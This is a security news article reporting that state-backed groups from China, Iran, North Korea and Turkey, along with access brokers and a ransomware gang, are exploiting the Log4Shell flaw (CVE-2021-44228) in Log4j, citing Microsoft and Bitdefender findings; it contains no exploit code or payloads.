State-sponsored hacker groups from China, Iran, North Korea and Turkey have been spotted exploiting the recently disclosed CVE-2021-44228 vulnerability (aka “Log4Shell”) in the Log4j logging utility to gain access to enterprise networks.

CVE-2021-44228 is a remote code injection vulnerability, which exists due to improper input validation when processing LDAP requests and could be abused by threat actors to hijack servers and apps over the internet. The disclosure of the flaw caused a widespread alarm because Log4j is widely used in commonly deployed enterprise systems. The flaw affects all versions of Log4j from 2.0-beta9 (released in September 2013) to 2.14.1 (March 2021).

This week, the Apache Software Foundation (ASF) released a new fix for the Log4j logging utility after it was found that the previous patch “was incomplete in certain non-default configurations.”

As Microsoft noted in an update on its Log4Shell guidance blog post, “this activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor’s objectives.”

Threat actors linked to the Log4Shell attacks include the Iran-linked APT group known as PHOSPHORUS, and HAFNIUM, a state-backed hacker group believed to have ties to the Chinese government. Microsoft did not name the threat groups operating out of North Korea and Turkey.

“MSTIC has observed PHOSPHORUS, an Iranian actor that has been deploying ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications,” the tech giant noted.

As for HAFNIUM, the group has been observed abusing the flaw to attack virtualization infrastructure.

“In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems,” Microsoft said.

Furthermore, multiple groups acting acting as access brokers have also been observed leveraging Log4Shell to gain initial access to target networks. These access brokers then sell access to these networks to ransomware-as-a-service affiliates. Exploitation attempts were observed on both Windows and Linux systems, Microsoft said.

On Monday, security firm Bitdefender warned of a first ransomware group leveraging the Log4Shell flaw to deploy a new ransomware strain called “Khonsari” on unpatched systems.